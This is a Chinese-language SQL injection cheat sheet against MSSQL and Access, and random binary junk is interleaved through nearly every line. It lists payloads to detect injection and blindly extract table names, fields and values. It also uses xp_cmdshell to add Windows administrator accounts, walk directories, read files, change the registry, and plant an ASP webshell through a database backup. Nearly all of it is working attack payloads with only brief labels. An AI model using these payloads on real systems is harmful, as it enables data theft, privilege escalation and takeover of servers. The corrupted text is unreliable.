1.判断是否有注入;and 1=1 ;and 1=2 �xH!�{;�i
2.初步判断是否是mssql ;and user>0 w0(A7�L:�L
ZN�N�gi@6>
3.注入参数是字符'and [查询条件] and ''=' ��U@yn%k�9
�@�U�08v_,
4.搜索时没过滤参数的'and [查询条件] and '%25'=' }"B�Xqh"\`
#�9uNJla��
5.判断数据库系统 ?(UeW�LC�#
42k�r&UY&
;and (select count(*) from sysobjects)>0 mssql %/N�B263Db
:t+XW`eQR:
;and (select count(*) from msysobjects)>0 access MgyV��{`��
t$m~�O��?I
�8`l� �bKV
�:1NF#-2\f
6.猜数据库 ;and (select Count(*) from [数据库名])>0 ��Y4����q;
~'k.'�O{
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 mu�sZC�g$�
'|V�"�!R)
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �,\ ��[R\s
YMx]i,u'�+
9.(1)猜字段的ascii值(access) f�-�&4�x_5
�VgLrufJ�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 #lXwBfBM�f
:23w[��vt=
(2)猜字段的ascii值(mssql) ".�Z�|zt6C
aGY R:jR$�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 IGqg,OEAp�
L�ld�Z�"%P
10.测试权限结构(mssql) s>hNw���b/
*\><M��Xx�
8i"���v�7}
��_dCdyf�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- >qkZn7�C �
,�Ax��k\7-
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- D�tLg�a[M
�VJquB8?H
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ��%"�kF� i
r�/o1a't;
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- uL�| Wu�q�
o6L��\39v_
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- hq�[;Q�F:B
}n�/��6�.%
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- d^AXhQjQN-
\>,[�5|G�U
;and 1=(select IS_MEMBER('db_owner'));-- &p|+K�
XIf
t���P/0_^m
�b?S��,%��
x UM,"+��h
11.添加mssql和系统的帐户 ot�Tv,T182
?Vg�251-�H
;exec master.dbo.sp_addlogin username;-- jN��R�R=0�
;exec master.dbo.sp_password null,username,password;-- �RN2^=�$'.
�Itaq4�^CE
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- Y~vyCU5nWR
W.u+�R?a=
;exec master.dbo.xp_cmdshell 'net user username password UqHk���2h-
x�~3N})T5
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ;\1/4;m���
hc#Lni�R3$
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �o�3C7��JG
REqQJ�7�a/
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- NPc@;�g]d"
ePF)�wl�;m
#�y�PQt!��
�APy�����e
12.(1)遍历目录 !j�8.JP}!)
j~DTvWg<Jl
;create table dirs(paths varchar(100), id int) ]k0�Pe�;<�
YO&=�f��d*
;insert dirs exec master.dbo.xp_dirtree 'c:\' �i3
?�cL�4
n[�|*[��II
;and (select top 1 paths from dirs)>0 �K,B �qVu�
i{��T �m�n
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 1{%�3OG^'
�$wnK"k%G�
�L��TsX{z
�EL/~c*a/�
(2)遍历目录 � ���C=k]g
(�x)�}k&B;
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- <V?csx/eRd
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ���@-B)a Z
� al#BfcZW
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 =�1�7d7�#-
R�9�+0Z�oS
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 K+Wbxo�vXU
w8(��8n&5�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 jg)+�]r/hS
3:H[�S�_q�
S=�f:-?N|�
UYL�Czv~�W
13.mssql中的存储过程 ,oin�<��K�
,Q�%q�!#@
xp_regenumvalues 注册表根键, 子键 z?H�i
u6c-
� /2s=;tA1
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 Hsdcv~Xr;l
� kD}w�5 U
xp_regread 根键,子键,键值名 Zw�zN=03�T
u4eA++�e�T
;exec xp_regread �G+5_I"`W�
As}��3V�Bd
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ?Z���F�~�U
{�e�35O�(Y
xp_regwrite 根键,子键, 值名, 值类型, 值 \}Hi\k+h':
>_�3P6-�L>
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 FG�RdA�^�`
P�]�A~:�Lj
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 +Oxw?�`I$�
5u5-:#sL�y
xp_regdeletevalue 根键,子键,值名 =\ek;d0Tqb
ScCp88KpFI
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 6y0CEly>3#
�Cf�~�vT"�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 Ld��H2�3�\
��U))2�?#
#B$r|rqamq
�s�!�g06�F
14.mssql的backup创建webshell 5�9R%g .2Y
;:��W��M^S
use model �ug�e~*S��
r�*F^8_YMK
create table cmd(str image); x��Gk�c_�
6�d�;_�}�
insert into cmd(str) values (''); �4{v��?<x8
6?`�3zdOeO
backup database model to disk='c:\l.asp'; �c*!x��dK�
6&,�{"N0�T
�,� �tEd�>
~9We)F�vU4
15.mssql内置函数 S�\poa:D�`
f,(����@K%
;and (select @@version)>0 获得Windows的版本号 6,���raRg6
��;5d����A
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �bxc!��x>)
SuJa?�VU1w
;and (select user_name())>0 爆当前系统的连接用户 fD* ?Jz�VY
q�x�'��F9I
;and (select db_name())>0 得到当前连接的数据库 �#;(�Q�� \
�Z@ dS�,M*
h�Y(q�@_�s
#qcF2&�a%�
16.简洁的webshell c,,(�s{1��
��-s_=4U,�
use model �zcE`�.)y�
p|�`[�8uY?
create table cmd(str image); �K%@#a}kRb
Ib}~Q@��?2
insert into cmd(str) values (''); IM��(�=�j�
D:5�6>%y@�
backup database model to disk='g:\wwwtest\l.asp';
